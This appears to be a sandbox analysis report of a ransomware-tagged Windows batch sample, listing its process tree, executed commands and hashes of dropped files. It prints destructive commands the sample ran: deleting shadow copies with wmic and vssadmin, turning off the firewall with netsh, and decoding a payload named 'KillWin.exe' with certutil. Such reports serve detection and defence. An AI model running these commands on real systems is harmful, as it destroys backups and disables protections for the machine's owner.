PID 1644 wrote to memory of 580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 1644 wrote to memory of 580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 1644 wrote to memory of 580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 1644 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 300 wrote to memory of 296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 300 wrote to memory of 296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 300 wrote to memory of 296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 1136 wrote to memory of 1068 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 1136 wrote to memory of 1068 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 1136 wrote to memory of 1068 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 980 wrote to memory of 2996 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

C:\Windows\system32\attrib.exe

attrib Admin-information.log +h

C:\Windows\explorer.exe

explorer .

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all/quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\mode.com

mode con: cols=170 lines=45

C:\Windows\system32\certutil.exe

certutil -decode "Image.bin" "Wallpaper.jpeg"

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\timeout.exe

timeout /t 4

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\system32\certutil.exe

certutil -decode "Data.lp" "KillWin.exe"

C:\Windows\system32\wscript.exe

wscript "m.vbs"

Network

N/A

Files

memory/2592-0-0x00000000039A0000-0x00000000039B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 9882f66d29c98a9e62598f7ca6adec56
SHA1 021f34f144313bd04a54bc38239d8e7dfb158631
SHA256 3bf0cf94c3419071a6223cc64eefe598a96ddfea15fc3f15552b98e560b0a3bf
SHA512 d4a4be97cf2e09006ba65f681f8e7aa00b4d6a0b0a6073c02fe1f90bd1717c3f09071e44f88c25070be84a17c512317c5c1e068b2f47a978cc78671c5c707421

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 e9ef8f6a7d04db16f1743173089d5a80
SHA1 49182dd2d8c4ebde136473d6bae123c8035bdce4
SHA256 6f6bb9b6a6d282981f42c22e37210bbd2d7cf1d9e69a4273cdf9d2a628efc749
SHA512 a0884f7e360cbca6a27fcba5155f7545decc450e85613bb4ad511ea7c6717cb067c60fbe1abde912fa2d4090ac520ab3ca6e26fd25812f427dceb91b82ade3e9

C:\Users\Admin\AppData\Local\Temp\Image.bin

MD5 eb05f382514e1a62572f9afd06a0a50d
SHA1 86a601e6b8a6e0dee089a66707a9a1d80bd33ba5
SHA256 24c3df9a48a7d1abd01b3a608505a33a3a2d3d907c7b6dad79c0f0da01125ab9
SHA512 2b46fcbcd1a35e09c22f3230b690783121fbdd504e4f3f34d3e1753db63d6720e5c6d752bad2d2015326e165b08b13d4c4ed7611cdaaad0e1f52a357e270a79f

C:\Users\Admin\AppData\Local\Temp\TempData\Null.dll

MD5 453468cc569708abb4fe3a00a475d096
SHA1 4cf6be38a9589675cffd62316c0544abc66b1459
SHA256 287b3124063720a50127e3a8bdde6b2f7c7e4432d90830de05b52ae14de78399
SHA512 e987c9a967262388e3815d0f10dd75a794f7862b01c69d58615c9c4deaea64647367d3461d910905915927ad0a3f90e0f573f60c51b83faa90df50511e656d46

C:\Users\Admin\AppData\Local\Temp\0.vbs

MD5 5b2f4b19baac5325cbeae4d8024d064c
SHA1 4f109afc12cec097f003f1723c1da56940f69b8f
SHA256 43464f239bf395e90405c7579f7380d06a0b581bbd0a8ca836b05a82808be78e
SHA512 7deb4fea0601cd364bda06c74d6a5d52ffb3d16935d8552c91ebca7d790f6566c64746ff58e61936356758f4b93d91931d477c363ccc4af9a133e0456f9fb40b

C:\Users\Admin\AppData\Local\Temp\Wallpaper.jpeg

MD5 1285cd98536d791db631ac4bbc4520b1
SHA1 c0cf2a608361742736fc886ee837c6a501cc1ed1
SHA256 8f16b68a09fb1ac498e34054c6b31634a7fba08204678b19d449f617c303c674
SHA512 f67065feb33b555748e5e82dd8c2b3da4992d03eab7444481b8d060fd74a579859bbbbf6f8f37aeb6e267ab4594a2c4732e90b5e2cf2cec006191885359f8826

C:\Users\Admin\AppData\Local\Temp\Data.lp

MD5 c63727e7d32cd53e644d8ab3435778fa
SHA1 4f187b6d1a0839ffff7bcc69368b40ca007067b3
SHA256 91d5604845d13992f916f56c2301cf866973520ef647a5d7073cdddc0bca3d00
SHA512 278aa953b1578c2b7eebcd6d4dc3241a3e8862ce1ebafb2e37ec3715f2f92833f147c41227052f8ec6f06ae35d71f810913b3c28dd1675ee5e473559b3e85bc7

C:\Users\Admin\AppData\Local\Temp\KillWin.exe

MD5 3713a4dfdfa399b20561aa8bcbea1b25
SHA1 8109cb8e9e9c00fba74d456c1756799c72072989
SHA256 8e4e731640114f96219d4aa6ce2416c2f1db7e75834cdca91c380de6b0eebbaa
SHA512 a34244e4622648dc19f2efa001bf461cec7794bb7050fadacd5369272d83db87fef711afbb5a108b7665304430a419ee7fdf09c2e8155f496eba1a321142b090

C:\Users\Admin\AppData\Local\Temp\4066_30760.bat

MD5 71f2ece5d6de26f528ff0e1c9382f1c9
SHA1 12b4fe9e4f1d4e0ea494393282baeb58f5991c8e
SHA256 648b31ac461f2539e111298e9d5f8e154ed8852a4f8c57cceec17504da8cdb01
SHA512 0236aa82c44f9cdc7230d2b46c910c794820202e697031c893ed8502883f310bc202beee7d4a502f5508c8f6c320f9479e48be30f24f344624a0224a1f549c56

C:\Users\Admin\AppData\Local\Temp\m.vbs

MD5 cbaa7c6cb3c383b11dd691b316f2a91b
SHA1 0f2d66cea7cc24e0dda9972e05a7b236a9bcbc9e
SHA256 5f1ffcde4ee668c3350fdd9730df67adc35c704342ac2224924069c9bae2be95
SHA512 fe74a8ccd7875e7bf9588d386fd886810dc0edd01216bf5a886add985fcbb813296a606ec83028a90d30b4df348125827300a98f2ec6081a5d981d09316a44f9